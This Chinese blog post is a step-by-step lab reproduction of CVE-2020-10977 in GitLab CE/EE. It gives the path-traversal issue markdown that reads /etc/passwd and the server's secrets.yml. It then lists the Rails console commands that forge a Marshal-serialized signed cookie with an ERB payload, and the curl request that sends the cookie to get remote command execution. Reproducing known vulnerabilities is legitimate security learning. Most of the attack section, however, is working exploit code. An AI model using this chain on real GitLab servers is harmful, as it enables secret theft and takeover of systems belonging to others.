CVE-2020-10977-GITLAB CE/EE 任意文件读取导致远程命令执行漏洞-环境搭建及完整复现图文详细笔记

漏洞环境搭建-CENTOS7

1.安装依赖软件

yum -y install policycoreutils openssh-server openssh-clients postfix

2.设置postfix开机自启,并启动,postfix支持gitlab发信功能(对漏洞环境应该不重要)

systemctl enable postfix && systemctl start postfix

3.下载gitlab安装包,然后安装
官方下载:
CE下载地址:https://packages.gitlab.com/gitlab/gitlab-ce
EE下载地址:https://packages.gitlab.com/gitlab/gitlab-ee

清华开源镜像站下载:
centos 6系统的下载地址:https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el6
centos 7系统的下载地址:https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7

漏洞版本范围在>=8.5,<=12.9

(ps:测试9.5.0的版本时没有找到move issue功能。查看当前gitlab版本命令:cat
/opt/gitlab/embedded/service/gitlab-rails/VERSION)

下载rpm包并安装:

wget https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7/gitlab-ce-9.5.0-ce.0.el7.x86_64.rpm

rpm -i gitlab-ce-9.5.0-ce.0.el7.x86_64.rpm

4.修改gitlab配置文件指定服务器ip和自定义端口

vim /etc/gitlab/gitlab.rb
在这里插入图片描述
这里我设置了8888端口

5.重置并启动Gitlab
执行以下命令

gitlab-ctl reconfigure

gitlab-ctl restart

显示成功启动之后,访问端口进入Gitlab页面,提示修改root密码

PS:若出现502页面,多次刷新页面即可,这是由于Gitlab性能要求比较高,服务器响应慢导致的,推荐虚拟机内存至少分配4G。

漏洞复现

测试版本为gitlab-12.8.7-ce

任意文件读取

0x001 新建两个测试项目

在这里插入图片描述

0x002 在其中一个project中创建新的issue,在其问题描述中输入下方代码,然后提交

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

在这里插入图片描述

0x003 创建issue成功后点击move issue,将它移动到test2中

在这里插入图片描述
在这里插入图片描述

0x004 test2中的issue中带了一个password附件

在这里插入图片描述

0x005 点击下载password附件,用记事本方式打开,发现其内容就是/etc/password的内容

在这里插入图片描述

RCE(REMOTE COMMAND/CODE EXECUTE)

0x001 利用任意文件读取漏洞,下载/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml文件,获取secret_key_base

在这里插入图片描述

0x002 问题描述中输入:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)

0x003 下载secrets.yml,获取secret_key_base
在这里插入图片描述
在这里插入图片描述

0x004 在自己的攻击机上搭建一个gitlab环境(详见环境搭建笔记),将目标机下载下来的secerts.yml覆盖在自己攻击机上/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

(也可以只替换secret_key_base)

0x005 使用gitlab-rails console执行以下命令

gitlab-rails console #进入rails console
  • 1

依次输入:

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `echo flag was here > /tmp/flag` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

在这里插入图片描述

0x006 获取cookie,构造语句:

curl -vvv 'http://192.168.1.86:8888/users/sign_in' -b "experimentation_subject_id=cookie"

(ps:experimentation_subject_id参数输入rail console获取的cookie值)

在这里插入图片描述

通过任意文件读取下载/tmp/flag文件,内容:“flag was here”,说明命令执行成功!

想了解更多可以查看漏洞博客
参考:https://hackerone.com/reports/827052

posted @ 2022-03-18 10:58  Fluorescence  阅读(427)  评论(0编辑  收藏  举报